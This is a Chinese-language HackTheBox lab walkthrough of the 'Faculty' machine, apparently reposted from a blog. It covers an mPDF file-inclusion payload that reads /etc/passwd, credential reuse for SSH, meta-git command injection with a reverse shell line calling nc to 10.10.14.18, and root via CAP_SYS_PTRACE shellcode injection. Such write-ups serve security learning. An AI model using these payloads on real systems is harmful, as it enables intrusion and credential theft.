HackTheBox - Medium - Linux - Faculty

发布时间:2024年01月13日

Faculty

Faculty 是一台中型 Linux 机器,具有 PHP Web 应用程序,该应用程序使用的库容易受到本地文件包含的影响。利用该库中的 LFi 会泄露一个密码,该密码可用于通过 SSH 以名为“gbyolo”的低级用户身份登录。用户“gbyolo”有权作为“developer”用户运行名为“meta-git”的“npm”包。此机器上安装的“meta-git”版本容易受到代码注入攻击,可利用该版本将权限升级到用户“developer”。通过利用“CAP_SYS_PTRACE”功能将 shellcode 注入到以“root”身份运行的进程中,可以将权限提升到“root”。


外部信息收集

端口扫描

循例nmap

file

Web枚举

file

gobuster扫目录

file

admin/

file

这里会转pdf

file

file

download.php,通过html进行url编码后再转base64直接生成pdf

file

尝试打XHR,但没成功

file

从pdf属性看到又是mPDF

file

谷歌能找到一个7.0版本的LFI

file

payload

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />

file

能读到

file

读/etc/nginx/sites-enabled/default

server {
	listen 80 default_server;
	listen [::]:80 default_server;

	root /var/www/html;

	# Add index.php to the list if you are using PHP
	index index.html index.htm index.nginx-debian.html;

	server_name _;

	rewrite ^ http://faculty.htb;
}

Foothold

绝对路径找不到真正的网站根目录,但可以相对路径读

login.php

file

db_connect.php读到一组凭据

file

密码重用于gbyolo账户,我们能够通过它登录ssh

file

本地横向移动 -> developer

sudo -l

file

在谷歌能够找到一篇meta git会受命令注入漏洞影响的文章

通过poc,能够执行命令创建文件

file

reverse shell payload

'sss||mkfifo /tmp/f1;nc 10.10.14.18 8888 < /tmp/f1 | /bin/bash > /tmp/f1 #'

file

本地权限提升

getcap

file

HackTricks提供了利用方法

msfvenom生成shellcode

file

利用python脚本生成payload

file

gdb

file

get root

file

文章来源:https://blog.csdn.net/qq_54704239/article/details/135567241
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。